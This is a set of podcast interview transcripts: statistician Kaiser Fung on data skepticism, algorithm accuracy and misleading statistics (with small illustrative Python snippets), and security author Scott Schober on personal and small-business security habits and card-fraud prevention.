Kaiser Fung: Well, I'm about...I mean, this is a preview of a blog post that I'm going to put out probably this week. And I don't know if this works for you guys because this could be a bit more involved, but here's the situation. It again basically reinforces the point that you can easily get fooled by the data. So my TA and I were reviewing a data set that one of our students is using for their class project. And this was basically some data about the revenue contributions of various customers and some characteristics of the customers. So we were basically trying to solve the problem of: is there a way to use these characteristics to explain why the revenue contributions for different customers have gone up or down?
So we spent a bit of time thinking about it, and we eventually came up with a nice way of doing it. You know, it's not an obvious problem, so we have a nice way of doing it, and we thought it actually produced pretty nice results. So then we met with the student, and pretty much the first thing that we learned from this conversation is that, oh, because this is proprietary data, all the revenue numbers were completely made up. Like there is some formula or whatever that she used to generate the numbers.
So that's sort of the interesting dynamic there. Because on the one hand, obviously, there's all of the work we put into creating this model, and the reason why we like the model is that it produces nicely interpretable results. Like it actually makes sense, right? But it turns out that, yes, it makes sense in that imaginary world, but it really doesn't have any bearing on reality, right? And then the other side of this, which I also touch upon in my book, is: if you were to just look at the methodology of what we did and the model that we built, you would say we did really good work, because we applied a good methodology and generated quick results.
So the method and the data and then your assumptions, all these things play a role in this ecosystem. And going back to what I was saying, the problem is all this data. I think we have not spent sufficient time to really think about what the sources of the data are and how believable the data is. And in this day and age, especially with marketing data, with online data and all that, there's a lot of manipulation going on. There are lots of people who are creating this data for a purpose. Think about online reviews and all these other things. So on the analysis side, we have really not faced up to this issue. We just basically take the data, we analyze it, we come up with models, and we say things. But how much of any of those things would be refuted if we actually knew how the data was created?
Cindy Ng: That's a really good takeaway. You are working on many things, it sounds like. You're working on a blog, you teach. What else are you working on these days?
Kaiser Fung: Well, I'm mainly working on various educational activities that I hope will train the next generation of analysts and people who look at data, so that they will hopefully have the Numbersense that I want to talk about. I have various book projects in mind which I hope to get to when I have more time. And from the Numbersense perspective, I'm interested in exploring ways to describe this in a more concrete way, right? So there's this notion of...I mean, this is a general ecosystem of things that I've talked about, but I want a system that ties it together a bit. And so I have an ongoing effort to try to make it more quantifiable.
Cindy Ng: And so if people want to follow what you're doing, what are your Twitter handle and your website?
Kaiser Fung: Yes, so my Twitter is @junkcharts. And that's probably where most of my, like in terms of updates that's where things go. I have a personal website called just kaiserfung.com where they can learn more about what I do. And then I try to update my speaking schedule there because I do travel around the country, speak at various events. And then they will also read about other things that I do like for corporations that are mostly around, again, training managers, training people in this area of statistical reasoning, data visualization, number sense and all that.
It's great to be Amazon, with only one on-call security engineer and security automated. However, for many organizations today, having security completely automated is still an aspirational goal. Those in healthcare would love to upgrade, but what if you're using a system that's FDA approved, which makes upgrading a little more difficult? What if hackers were able to download personal data from a web server because many servers weren't up to date and had outdated plugins? Meanwhile, here's a lesson from veteran reporter Brian Krebs on how not to acknowledge a data breach.
By the way, would you ever use public wifi and do you value certificates over experience?
In part one of our interview with Kaiser, he taught us the importance of looking at the process behind a numerical finding.
We continue the conversation by discussing the accuracy of statistics and algorithms. With examples such as shoe recommendations and movie ratings, you’ll learn where algorithms fall short.
Kaiser, do you think algorithms are the answer? And when you're looking at a numerical finding, how do you know what questions to ask?
Kaiser Fung: So I think...I mean, there are obviously a big pile of questions that you could ask, but I think the most important question not asked out there is the question of accuracy. And I've always been struck, I keep mentioning this to my blog readers, that if you open up any of the articles that are written, whether it's the New York Times or the Wall Street Journal, you know, all these papers have big data articles, and they talk about algorithms, they talk about predictive models and so on. But you can never find a quantified statement about the accuracy of these algorithms.
They will all qualitatively tell you that they are amazing and wonderful. And really, it all starts with understanding accuracy. In the Numbersense book, I address this with the Target example of the tendency models. But also in my previous book, I talk about the whole thing around steroids and also lie detector testing, because it's all kind of the same type of framework. It's really all about understanding the multiple different ways of measuring accuracy. So it starts with understanding false positives and false negatives, but really, other more useful metrics are all derived from those. And you'll be shocked at how badly these algorithms perform.
I mean, it's not that...from a statistical perspective, they are pretty good. I try to explain this to people, too. It's not that we're all kind of snake oil artists, that these algorithms do not work at all. Usually they work if you compare them with not using an algorithm at all. So you actually get incremental improvements, and sometimes pretty good improvements, over the case of not using an algorithm.
Now, however, if not using the algorithm leads to, let's say, 10% accuracy, and now we have 30% accuracy, you would be three times better. However, 30% accuracy still means that 70% of the time you got the wrong thing, right? So there's an absolute versus relative measurement here that's important. And once you get into that whole area, it's very fascinating, because usually the algorithms also do not really make decisions; there are specific decision rules in place, because oftentimes the algorithms only calculate a probability of something.
So by analogy, the algorithm might tell you that there's a 40% chance of rain tomorrow. But somebody has to create a decision rule that says, you know, "I'm going to carry an umbrella if it's over 60%." So there's all this other stuff involved. And then you have to also understand the soft side of it, which is the incentive of the various parties to go one way or the other. And the algorithm ultimately reflects the designer's choices, because the algorithm will not make the determination of whether you should bring an umbrella, whether it's over 60% or under 60%. All it can tell you is that for today it's 40%.
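To make the relative-versus-absolute point and the decision-rule point concrete, here is a small sketch using the illustrative numbers from the discussion (the 60% threshold is the designer's arbitrary choice, not anything the algorithm produces):

```python
# Relative vs. absolute accuracy, using the illustrative figures from the conversation.
baseline_accuracy = 0.10   # accuracy without the algorithm
model_accuracy = 0.30      # accuracy with the algorithm

print(f"Relative improvement: {model_accuracy / baseline_accuracy:.0f}x better")
print(f"Absolute error rate:  {1 - model_accuracy:.0%} of cases still wrong")

# The algorithm only outputs a probability; a human-chosen rule turns it into a decision.
def carry_umbrella(chance_of_rain: float, threshold: float = 0.60) -> bool:
    """Decision rule layered on top of the model's probability (threshold is the designer's choice)."""
    return chance_of_rain >= threshold

print(carry_umbrella(0.40))  # False: a 40% chance of rain is below the 60% threshold
```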
So I think this notion that the algorithm is running on its own is false anyway. And once you have human input into these algorithms, then you also have to wonder about what the humans are doing. And I think in a lot of these books, I try to point out that what also complicates it is that in every case, including the case of Target, there will be different people coming at this from different angles, trying to optimize objectives that are conflicting.
That's the beginning of this...that sort of asking questions about the output. And I think if we start doing that more, we can avoid some of this. A very recent situation that ties into our conversation here is this whole collapse of this…company. I'm not sure if you guys have been following that.
Well, it's an example of somebody who's been selling this algorithm people have been asking about. A lot of people have not been asking for quantifiable results, and the people who have been asking for quantifiable results have basically been pushed back on and, you know, they refused all the time to present anything. And then, at this point, I think it's been acknowledged that it's all...you know, empty, it's hot air.
Andy Green: Right, yeah. You had some funny comments, I think it was on your blog, and this is related to these algorithms, about, I guess, buying shoes on the web, on, I don't know, one of the websites. And you were saying, "Well," they were coming up with some recommendations for other types of items that they thought you would be interested in. And what you really wanted was to go onto the website and, at least when you went to buy the shoe, have them take you right to the shoe size that you ordered in the past or the color that you ordered.
Kaiser Fung: Right, right, yes.
Andy Green: And that would be the simple, obvious thing to do, instead of trying to come up with an algorithm to figure out what you might like and making suggestions...
Kaiser Fung: Yeah. So I think there are many ways to think about that. Part of it is that oftentimes the most unsexy problems are the most impactful, but people tend to focus on the sexiest problems. So in that particular case, the whole article was about the idea that what makes prediction inaccurate is not just the algorithm being bad...well, I mean, the algorithms oftentimes actually are not bad. It's that the underlying phenomenon that you are predicting is highly variable.
So I love to use examples like movies, since movie ratings were really big some time ago. How you rate a movie is not some kind of constant. It depends on your mood, it depends on what you did, it depends on who you're with. It depends on so many things. The same person, seeing the same movie in different settings, would probably give different ratings. So in that sense, it is very difficult for an algorithm to really predict how you're going to rate the movie. But what I was pointing out is that there are a lot of other types of things that the algorithms could predict that have what I'd call an essentially invariant property.
And a great example of that is the fact that almost always, I mean it's still not a hundred percent but 90% of the time, you're buying stuff for yourself, and therefore you have certain shirt sizes, shoe sizes and so on. And therefore it would seem reasonable that they should just show you the things that are appropriate for you. And that's...it's not a very sexy type of prediction, but it is a kind of prediction. And there are many, many other situations like that. It's like, if you just think about even using email software, there are certain things that you click on every time because the way it's designed is not quite the way you use it. So we have all the data available, they're measuring all this behavior, it could very well be predicted.
So I feel like everybody who has done the same with the clicks every time because they're very much like, "Well, I just say what I mean."
Recently in the security space, there's been a spate of contradicting priorities. For instance, a recent study showed that programmers will take the easy way out and not implement proper password security. Anecdotally, a security pro in a networking and security course noticed another attendee who covered his webcam but, noticeably, had his BitLocker recovery code printed on a label attached to his screen. When protocols and skills compete for our attention, ironically, security gets placed on easy mode. In the real world, attackers can potentially create malware that would automatically add "realistic, malignant-seeming growths to CT or MRI scans before radiologists and doctors examine them." And how about that time when ethical hackers were able to access a university's student and staff personal data, finance systems, and research networks? Perhaps more education and awareness are needed to take security out of easy mode and bring it into real-time alerting mode.
In the business world, if we’re looking for actionable insights, many think they can be found using an algorithm.
However, statistician Kaiser Fung disagrees. With degrees in engineering and statistics and an MBA from Harvard, Fung believes that both algorithms and humans are needed, as the whole is greater than the sum of its parts.
Moreover, the worldview he suggests one should cultivate is numbersense. How? When presented with a numerical finding, go the extra mile and investigate the methodology, biases, and sources.
For more tips, listen to part one of our interview with Kaiser as he uses recent headlines to dissect the problems with how data is analyzed and presented to the general public.
Cindy Ng: Numbersense essentially teaches us how to make simple sense out of complex statistics. However, statistician Kaiser Fung says that cultivating numbersense isn’t something you can learn from a book. But there are three things you can do. First, you shouldn’t take published data at face value. Second, know what questions to ask. And third, have a nose for doctored statistics.
And so, the first bullet is that you shouldn't take published data at face value. To me, that means it takes more time to get to the truth that matters, to the issue at hand. And I'm also wondering to what extent the volume of data, big data, affects fidelity, because that certainly affects your final result.
Kaiser Fung: There are lots of aspects to this. I would say, let's start with the idea that, well, it's kind of a hopeless situation, because you pretty much have to replicate everything or check everything that somebody has done in order to decide whether you want to believe the work or not. I would say, well, in a way that's true, but over time you develop kind of a shortcut. Part of it is that if you have done your homework on one type of study, then you can apply all the lessons very easily to a different study, so you don't have to actually repeat all that.
And also, organizations and research groups tend to favor certain types of methodologies. So once you've understood what they are actually doing and what the assumptions behind the methodologies are, then you have developed some idea about whether you're a believer in their assumptions or their method. Also, over time, you know, there are certain people whose work I have come to appreciate. I've studied their work, and they share some of my own beliefs about how to read data and how to analyze data.
So there's this sense that it also depends on who is publishing the work. I think part one of the question is to encourage people to not just take what you're told but to really think about what you're being told. There are some shortcuts to that over time. Going back to your other issue related to the volume of data, I think that is really causing a lot of issues. And it's not just the volume of data but the fact that the data today is not collected with any design or plan in mind. And oftentimes, the people collecting the data are really divorced from any kind of business problem, or divorced from the business side of the house. The data has just been collected and now people are trying to make sense of it. And I think you end up with many challenges.
One big challenge is that you don't end up solving any problems of interest. I just put something up on my blog about this, just this weekend. And it's related to somebody's analysis of, I think, Tour de France data. And there was this whole thing about, "Well, nowadays we have Garmin and we have all these devices, they're collecting a lot of data about these cyclists. And there's nothing much done in terms of analysis," they say.
Which is probably true, because again, all of that data has been collected with no particular design or problem in mind. So what do they do? Well, they basically say, "Well, I'm going to analyze the color of the bikes that have won the Tour de France over the years." That's kind of the state of the world that we're in: we have the data, and then we try to force it to answer whatever questions we can come up with after the fact.
And oftentimes these questions are actually very silly and don't really solve any real problems, like the color of the bike. I don't think anyone believes it impacts whether you win or not.
I mean, that's just an example of the types of problems that we end up solving, and many of them are very trivial. And I think the reason we are there is that when you just collect data like that...let's say you have a lot of this data, let's assume it measures how fast the wheels are turning, the speed of your bike, all that type of stuff. The problem is that when you don't have an actual problem in mind, you don't actually have all of the pieces of data that you need to solve a problem. And most often what you don't have is an outcome metric.
You have a lot of this sort of expensive data, but there's no measurement of the thing that you want to impact. And in order to get that, you have to actually merge in a lot of data or try to collect data from other sources. And oftentimes you cannot find appropriate data, so you're kind of stuck in this loop of not having the ability to do anything. So I think the paradox of the big data age is that we have all this data but it is almost impossible to make it useful in a lot of cases. There are many other reasons why the volume of data is not helping us. But I think...what flashed into my head right now, because of…, is that one of the biggest issues is that the data is not solving any important problems.
Andy Green: Kaiser, getting back to what you said earlier about not just accepting what you're told, I've also now become a big fan of your blog, Junk Charts. And there was one post, I think it's pretty recent, where you commented on a New York Times article on CEO pay.
And then you actually looked a little deeper into it and came to sort of the opposite conclusion. Can you talk about that a little bit? Because the whole approach there has to do with Numbersense.
Kaiser Fung: Yeah. So basically what happened was there was this big headline about CEO pay. And it was one of these sort of counter-intuitive headlines that basically said, "Hey, surprise..." Sort of a surprise, CEO pay has dropped. And it even gave a particular percentage; I can't remember what it was in the headline. And I think the Numbersense part of this is that when I read something like that...for certain topics like this one, since I have an MBA and I've been exposed to this type of analysis, I have some preconceived notion in my head about where CEO pay is going. And so it triggers a bit of doubt in my head.
So then what you want to do in these cases, and oftentimes this is an example of a very simple thing you can do: just click on the link in the article and go to the original report and start reading what they say. In this particular case, you actually only need to read literally the first two bullet points of the executive summary of the report, because then immediately you'll notice that CEO pay has actually gone up, not down. And it all depends on what metric people use.
And both are actually accurate from a statistical perspective. The metric that went up was the median pay, the middle person. And the number that went down was the average pay. And here you basically need a little bit of statistical background, because you have to realize that CEO pay is an extremely skewed number. Even at the very top, and I think they only talk about the top 200 CEOs, the top person is making something like twice what the second person makes. It's a very, very steep curve. So the average is really meaningless in this particular case, and the median is really the way to go.
And so, you know, I basically blogged about it and said that that's a really poor choice of headline, because it doesn't represent the real picture of what is actually going on. So that's the story. And that's a great example of what I like to tell people: in order to get to that level of reasoning, you don't really need to take a lot of math classes, you don't need to know calculus. I think it's a misnomer, perpetuated by many, many decades of college instruction, that statistics is all about math and you have to learn all these formulas in order to go anywhere.
Andy Green: Right. Now, I love the explanation. And it seems that if the Times had just shown a bar chart, it would have been clearer, even if a little difficult. What you're saying is that at the upper end, there are CEOs making a lot of money, and they just dropped a little bit. And correct me if I'm wrong, but everyone else, or most of the CEOs, 80% or whatever the percentile is, did better. But those at the top, because they're making so much, lost a little bit and that dragged the average down. But meanwhile, if you polled CEOs, whatever the number is, 80% or 90% would say, "Yes, my pay has gone up."
Kaiser Fung: Right, yeah. I did look at the exact numbers; I don't remember what they are, but conceptually speaking, given this type of distribution, it's possible that just the very top guy dropping by a bit is sufficient to move the average. Meanwhile the median, the middle guy, has actually moved up. And what that implies is that the bulk, you know, the weight of the distribution, has actually gone up.
There are many different levels to this that you can talk about. The first level is getting the idea that you really should talk in terms of the median. And if you really want to dig deeper, which I did in my blog post, you also have to think about what components drive CEO pay, because they're accounting for not just the fixed base salary but maybe also bonuses, and maybe they even price in the stock components, and you know the stock components are going to be much more volatile.
It all points to the fact that you really shouldn't be looking at the average, because it's so affected by all these other ups and downs. So to me, it's a basic level of statistical reasoning that unfortunately doesn't seem to have improved in the journalistic world. Even in this day and age, when there's so much data, they really need to improve their ability to draw conclusions. That's a pretty simple example of something that can be improved. There are also a lot of examples of things that are much more subtle.
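To make the median-versus-average point concrete, here is a minimal sketch in Python using entirely hypothetical pay figures (not the numbers from the Times report or Kaiser's post): in a steeply skewed distribution, a drop at the very top pulls the mean down even while the median, the middle CEO, moves up.

```python
# Hypothetical pay for ten CEOs, in millions of dollars (steeply skewed).
# These numbers are made up purely to illustrate the mean-vs-median effect.
import statistics

last_year = [98, 50, 30, 22, 18, 15, 13, 12, 11, 10]
this_year = [70, 50, 31, 23, 19, 16, 14, 13, 12, 11]  # top pay drops; everyone else inches up

for label, pay in [("last year", last_year), ("this year", this_year)]:
    print(f"{label}: mean = {statistics.mean(pay):.1f}M, median = {statistics.median(pay):.1f}M")

# last year: mean = 27.9M, median = 16.5M
# this year: mean = 25.9M, median = 17.5M
# The mean ("average pay") falls while the median rises, so headlines saying
# CEO pay dropped and CEO pay rose can both be statistically accurate.
```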
I'd like to give a different example of this, and it also comes from something that showed up in the New York Times some years ago. It was a very simple scatter plot that was trying to correlate the average happiness of people in different countries, which is typically measured by survey results, so you rate your happiness on a scale of zero to ten or something like that, with what they call the progressiveness of the tax system in each of those countries.
So, the thing that people don't understand is that by making this scatter plot, you have actually imposed upon your reader a particular model of the data. And in this particular case, it is the model that says that happiness can be explained by just one factor, which is the tax system. In reality, there are a gazillion other factors that affect somebody's happiness. And if you know anything about statistics, you would learn that it's multivariable regression that would actually control for all the other factors. But when you do a scatter plot, you haven't adjusted for anything else. So this very simple analysis could be extremely misleading.
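A minimal sketch of that point in Python, using entirely synthetic data (not the Times chart or its sources): the slope implied by a one-factor scatter plot can look meaningful even when the true effect is zero, while a multivariable regression that controls for a confounding factor recovers it.

```python
# Synthetic illustration of omitted-variable bias: the "scatter plot" model
# fits happiness on tax progressivity alone; the multivariable fit also
# controls for income, the confounder that actually drives happiness here.
import numpy as np

rng = np.random.default_rng(0)
n = 200
income = rng.normal(0, 1, n)                                   # confounding factor
tax_progressivity = 0.8 * income + rng.normal(0, 1, n)
happiness = 1.5 * income + rng.normal(0, 1, n)                 # true effect of tax is zero

# One-factor fit: the model a scatter plot implicitly imposes on the reader.
slope_single = np.polyfit(tax_progressivity, happiness, 1)[0]

# Multivariable least-squares fit controlling for income.
X = np.column_stack([tax_progressivity, income, np.ones(n)])
slope_multi = np.linalg.lstsq(X, happiness, rcond=None)[0][0]

print(f"single-factor slope: {slope_single:.2f}")   # spurious, clearly positive
print(f"controlled slope:    {slope_multi:.2f}")    # close to the true value, 0
```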
Should CISOs use events or scenarios to drive security, rather than checklists? It also doesn’t matter how much you spend on cybersecurity if it ends up becoming shelfware. Navigating one’s role as a CISO is no easy feat. Luckily, the path to becoming a seasoned CISO is now easier with practical classes and interviews. But when cybersecurity is assumed to be not very important, does that defeat the leadership role of a CISO?
Panelists: Cindy Ng, Sean Campbell, Mike Buckbee, Kris Keyser
Scott Schober wears many hats. He's an inventor, software engineer, and runs his own wireless security company. He's also written Hacked Again, which tells the story of his long-running battle against cyber thieves. Scott has appeared on Bloomberg TV, Good Morning America, CNBC, and CNN.
We continue our discussion with Scott. In this segment, he talks about the importance of layers of security to reduce the risks of an attack. Scott also points out that we should be careful about revealing personal information online. It's a lesson he learned directly from legendary hacker Kevin Mitnick!
Scott Schober: Absolutely. I mean, to your point, can cell phones be attacked? Absolutely. That's actually where most hackers are starting to migrate their attacks: toward the cell phone. And why is that? They're aiming especially at the Android environment. It's open source, applications are not vetted as well, everybody is prone to hacking and vulnerable, and there are more Android users. You've got open source, which is ideal for creating all kinds of malicious viruses, ransomware, DDoS, whatever you want to create and launch. So that's their preferred method, the easiest path to get in there, but Apple certainly isn't immune either.
The other thing is that mobile phone users are not updating their security patches as often as they should, and that becomes problematic. It's not everybody, but a good portion of people are just complacent. And hackers know that eventually everybody's old Windows PC will be either abandoned or upgraded to something more current. So they'll target the people still using old Windows XP machines, where there are no security updates and they're extremely vulnerable, until that dries up. Then they're gonna start migrating over to mobile devices...tablets, mobile phones...and really heavily increase the hacks there. And keep in mind why. Where are you banking? Traditionally everybody banked at a physical bank or from their computer. Now everybody's starting to do mobile banking from their device...their phone. So where are they gonna go if they want to compromise your credit card or your banking account? Your mobile device. Perfect target.
Andy Green: Yeah. I think I was reading on your blog that, I think, your first preference is to pay cash as a consumer.
Scott Schober: Yes. Yes. Yep.
Andy Green: And then I think you mentioned using your iPhone next. Is that, did I get that right?
Scott Schober: Yeah, you could certainly..."Cash is king," I always say. And minimize. I probably shouldn't say it, but I do have one credit card that I use and monitor very carefully, and I try to use it only at secure spots that I know. In other words, I don't use it at just any gas station to get gas, and I don't use it for general things like eating out. As much as I can use cash, I will, to minimize my digital footprint and avoid putting my credit out there too much. And I also watch closely if I do hand somebody my credit card. I write on the back of it, "Must check ID." And people sometimes...not always...will say, "Can I see your ID?" I hand them my license. "Thank you very much." Little things like that go a long way in deterring somebody, especially if you're handing your credit card to somebody that's about to swipe it through a little square and steal your card info. When they see that, they realize, "Oh, gosh, this guy must monitor his statement closely. He's asking for ID. I'm not gonna try to take his card number here." So those little tips go a long, long way.
Andy Green: Interesting. Okay. So in the second half of the "Hacked Again" book, you give a lot of advice on, sort of, security measures that companies can take and it's a lot of tips that, you know, we recommend at Varonis. And that includes strong passwords. I think you mentioned strong authentication. Pen testing may have come up in the book as well. So have you implemented this at your company, some of these ideas?
Scott Schober: Yes, absolutely. And again, I think in the book I describe it as "layers of security," and I often relate that to something we can all physically relate to, and that's our house. We don't typically have a single lock on our front door. We've got a deadbolt. We've got a camera. We've got alarm stickers, the whole gamut. The more we have our defenses up, the more likely a physical thief will go next door or down the block to rob somebody else. The same is true in cyber-security. Layered security, so not just our login credentials, a user name and a password. It's a long and strong password, which most people are starting to get, although they're not all implementing it. We never reuse the same password or parts of a password on multiple sites, because password reuse is still a huge problem. More than half of people still reuse their passwords, even though they hear how bad it is, because we're all lazy. And then having that additional layer, multi-factor authentication or two-factor authentication. That additional layer of security, be it when you're logging into your Gmail account or whatever, having a text go to your phone with a one-time code that will disappear. That's very valuable.
Messaging apps: since we deal a lot with the surveillance community, we understand how easy it is to look at content. So for anything that is very sensitive, I will use a secure messaging app. And what I look for is something like...the one I've been playing with and actually have on my phone is Squealock. There, you do not have to provide your actual mobile phone number. Instead, you create a unique ID and you tell the people you wanna text and talk to, "Here's my ID." So nobody ever actually has your mobile phone number, because once you give out your mobile phone number, you give away pieces of information about you. So I really strongly encourage people to think before they put too much information out there. Before you give your phone number away. Before you give your Social Security number away if you're going to a doctor's office. Are you required to do that? The answer is no, you're not, and they cannot deny you treatment if you don't give them a Social Security number.
Andy Green: Interesting. Yeah.
Scott Schober: But yet everybody gives it.
Scott Schober: So think very carefully before you give away these little tidbits, because they add up to something very quickly, and that could be catastrophic. I was speaking at an event two weeks ago down in Norfolk, Virginia, a cyber-security convention, and during one of the keynotes they invited me up and asked if I'd be willing to see how easy it is to perform identity theft and compromise information on myself. I was a little reluctant, but I said, "Okay, everything else is out there," and I know how easy it is to get somebody's information, so I was the guinea pig. And it was Kevin Mitnick who performed it. This is the world's most famous hacker, so it made it very interesting.
Andy Green: Yes.
Scott Schober: And within 30 seconds and at the cost of $1, he pulled up my Social Security number.
Andy Green: Right. It's astonishing.
Scott Schober: Scary. Scary. Scary.
Andy Green: Yep, very scary. Yeah...
Scott Schober: And any hacker can do that. That's the part that is kinda depressing, I think. So even though you could be so careful, if somebody really wants anything bad enough, there is a way to do it. So you wanna just put up your best defenses to minimize and hopefully they move on to the next person.
Andy Green: Right. Yeah, I mean, we've seen hackers, or on the blog, we've written about how hackers are quite good at sort of doing initial hacks to get sort of basic information and then sort of build on that. They end up building really strong profiles. And we see some of this in the phishing attacks, where they seem to know a lot about you, and they make these phish mails quite clickable because it seems so personalized.
Scott Schober: It can be very convincing. Yes.
Andy Green: Very convincing. So there's a lot out there already on people. I was wondering, do you have any advice...? We're sort of pro-pen testing at Varonis. We just think it's very useful in terms of assessing real-world risks. Is that something...can you recommend that for small, medium businesses, or is that something that may be outside their comfort zone?
Scott Schober: No, I do have to say, on a case-by-case basis, I always ask business owners to do this first. I say, "Before you jump out and get a vulnerability assessment or pen testing, both of which I do normally recommend, analyze what of value you have within the walls of your company." Again, like you mentioned earlier, good point: are you storing customer information? Credit card information? Account numbers? Okay, then you have something very valuable, not necessarily just to your business, but to your customers. You need to make sure you protect that properly. And the way you protect it properly is by knowing where your vulnerabilities are for a bad guy to get in. That is very, very important. What pen tests and vulnerability assessments reveal are things that your traditional IT staff will not know. Or in a very small business, they won't even think of these things. They don't think about updating, you know, the security patches on WordPress for your website, or other basic things. Having the world's most long and strong password for your wireless access point? "Well, only my employees use it." That's what they think. But guess what? A hacker pulls into your lot after hours and runs some automated software that will pull off the internet everything and anything about you and your company, in case part of that is part of your password. And guess what? They have a high success ratio with some of these automated programs for guessing passwords. That is very scary to me. Or they may use social engineering techniques to try to get some of that information out of a disgruntled employee or an innocent secretary or whatever...we've all heard these extreme stories...to get into your computer networks and place malware there. So that's how you really find out. You get an honest appraisal of how secure your company is. Yeah, we did it here. I was honestly surprised: I thought, "Wow, we've got everything covered," and then I was like, "What? We never would have thought of that." So there are some gotchas that are revealed afterward. And you know what, if it's embarrassing, who cares? Fix it and secure it, and that'll protect your company and your assets.
And again, you gotta think about IP. Some companies...in our industry, we've got a lot of intellectual property here; built up over 44 years as a company, that's our secret sauce. We don't want that ending up in other international markets where it could be used against us competitively. So how do you protect that? By making sure your company is very, very secure. Not just physical security, though that is extremely important; it goes hand in hand. But also keeping your computer network secure. And from the top down, every employee in the organization realizes they're not part of the security problem. They're part of the security solution, and they have a vested interest in making sure of that...yeah.
Andy Green: Yeah, no, absolutely. We're on the same page there. So do you have any other final advice for either consumers or businesses on security or credit cards or...?
Scott Schober: Again, I always like to make sure this resonates with people: people have the power to control their own lives and still function and still have a relative level of security. They don't have to live in fear and be overly paranoid. Am I paranoid? Yes, because maybe an exceptional number of things keep happening to me and I keep seeing that I'm targeted. I had another email the other day from Anonymous, and different threats and crazy things keep unfolding. That makes you wonder and get scared. But do the things that are in your control. Don't put your head in the sand and get complacent, as most people tend to do. People say, "Well, just about everybody's been compromised. Why bother? It's a matter of time." Well, if you take that attitude, then you will be the next victim. But if you can make it really difficult for those cyber-hackers, at least you can say with a clean conscience, "I made them work at it," and hopefully they'll move on to the next target. And that's my goal, to really encourage people: don't give up. Keep trying, and even if it takes a little bit more time, take that time. It's well, well worth it. It's a good investment to protect yourself in the long run.
Andy Green: No, I absolutely agree. Things like two-factor authentication on, let's say, Gmail or some of your other accounts and longer passwords. Just make it a little bit harder so they'll then move on to the next one. Absolutely agree with you.
Scott Schober: Yeah, yeah. That's very true. Very true.
Andy Green: Okay. Thank you so much for your time.
Scott Schober: Oh, no, any time, any time. Thank you for the time. Really appreciate it and stay safe.
Scott Schober wears many hats. He's an inventor, software engineer, and runs his own wireless security company. He's also written Hacked Again, which tells the story of his long-running battle against cyber thieves. Scott has appeared on Bloomberg TV, Good Morning America, CNBC, and CNN.
In the first part of the interview, Scott tells us about some of his adventures in data security. He's been a victim of fraudulent bank transfers and credit card transactions. He's also aroused the wrath of cyber gangs, and his company's site was a DDoS target. There are some great security tips here for both small businesses and consumers.
Scott Schober: Yeah, thanks for having me on here.
Andy Green: Yeah, so for me, what was most interesting about your book "Hacked Again," is that hackers actively go after small, medium businesses, and these hacks probably don't get reported in the same way as an attack on, of course, Target or Home Depot. So, I was wondering if you could just talk about some of your early experiences with credit card fraud at your security company?
Scott Schober: Yeah, I'd be happy to. My story, I'm finding, is not that different from many other small business owners'. What is different, perhaps, is that many small and medium-size business owners are somewhat reluctant to share the fact that they have actually had a breach within their company. Oftentimes that's because they're embarrassed, or maybe they have a brand they don't wanna have tarnished; they're afraid customers won't come back to the well and purchase products or services from them. In reality... I talk about breaches pretty much every week now, trying to educate and share my story with audiences, and I always take a poll. And I am amazed: now almost everybody raises their hand that they've had some level of compromise, either of their business or personally, be it a debit card or credit card.
So, it's something that resonates now, and a lot more people realize that it's frequent; it almost becomes commonplace. Another card gets issued, and they have to dispute charges, and write letters, and go through the wonderful procedure that I've had to go through. I think, with myself, it's happened more frequently, unfortunately, because sharing tips and how-tos and best practices with individuals kinda gets the hackers a little bit annoyed, and they like to take on the challenge to see if they can be disruptive or send a message to those who are educating people on how to stay safe, because obviously it makes their game a lot harder.
And I'm not alone. I'm in good company with a lot of other security experts out there in the cyber world who have been targeted. We all share war stories, and we've always got a target on our back, I guess it's safe to say. With myself, it started with a debit card, then a credit card, then eventually the checking account: sixty-five thousand dollars was taken out. And I realized this was not just a coincidence. This is a targeted, focused attack against me, and it really hasn't stopped since. I wish I could say it has, but every week I'm surprised by something I find.
Andy Green: Right.
Scott Schober: Very scary. I have to just keep reinforcing what we're doing in making it safer to run our business and protect ourselves and our assets.
Andy Green: Right. So, I was wondering if you had just some basic tips because I know you talked a lot...you had some credit card fraud early on. But some basic advice for companies that are using credit cards or e-commerce. Is there something like an essential tip in terms of dealing with credit card processing?
Scott Schober: Yeah, yeah, absolutely. There's actually a couple things that I always share with people. Number one, a lot of it has to do with how well do you manage your finances, and this is basic 101 finances. When you have a lot of credit cards, it's hard to manage and hard to keep on top of looking at the statements or going online and making sure that there's no fraudulent activity. Regular monitoring of statements is essential. I always emphasize, minimize the number of cards you use. Maybe it's one card that you use, perhaps a second card you use for online purchases. Again, so it could be very quickly isolated and cleaned up if there is a compromise.
It's ironic, the other day I was actually presenting at a cyber security show and I was about to go up on stage and my wife called me in a panic. She has one credit card in her own name that she took out many years ago, and she says, "You won't believe it, my card was compromised. How could this happen?" So here it is, I'm preaching to my own family and she's asking me how it happened. She was all embarrassed and frustrated. It's because if we're not regularly monitoring the statements and not careful where we're shopping, we just increase the odds. It's a numbers game. So, really, minimize and be very careful where you shop, especially online. If we shop for the best price, the best bargain, oftentimes there will be a site with the cheapest price, and that's a telltale sign there's gonna be stolen credit card data involved. Go to name-brand stores online and you have a much, much better chance that your credit card is not gonna be compromised.
Andy Green: Right. So, that's actually some good advice for consumers, but what about for vendors? Because as a company, you were taken advantage of. I think I have a note here of a $14,000 charge?
Scott Schober: You're exactly right, yes. That's a little different. That particular charge, just to clarify, was somebody who was purchasing our equipment and provided a stolen credit card to pay for it. So there the challenge is, how do you vet somebody you don't see face-to-face or don't know personally, especially in another country? How do you make sure that that customer is legit? And I've done a couple of simple things to do that. In fact, I did one earlier today. Number one, pick up the phone and ask a lot of questions; verify that they are who they say they are and what their corporate address is. Make sure you're talking to a person in the accounting department if it's a larger company. Try to vet them and make sure they're legit; go online and see. Yes, there are fake websites and fake company profiles and things. But cross-checking helps: do a quick Google search, go onto LinkedIn and see if you find that same person, their title, their background. Does it jibe with what you're hearing on the phone and what you're reading in the email? It's very, very important. Do your due diligence, even if it takes you five or ten extra minutes. You could prevent a breach and save yourself a lot of hassle and a lot of money.
Andy Green: Right. So, would a small business like yours be held liable if you don't do that due diligence, or does the credit card company protect you if you do the due diligence and then there turns out to be a fraudulent charge?
Scott Schober: Great question. Unfortunately, the laws largely protect the buyer, the consumer. There are far fewer laws in place to protect the business owner. And I found that out the hard way, in some cases, in talking to other business owners. It's really hard to get your money back: the second there's a dispute, that money comes out of the account and goes into an account held between the two parties until it can actually be settled or arbitrated.
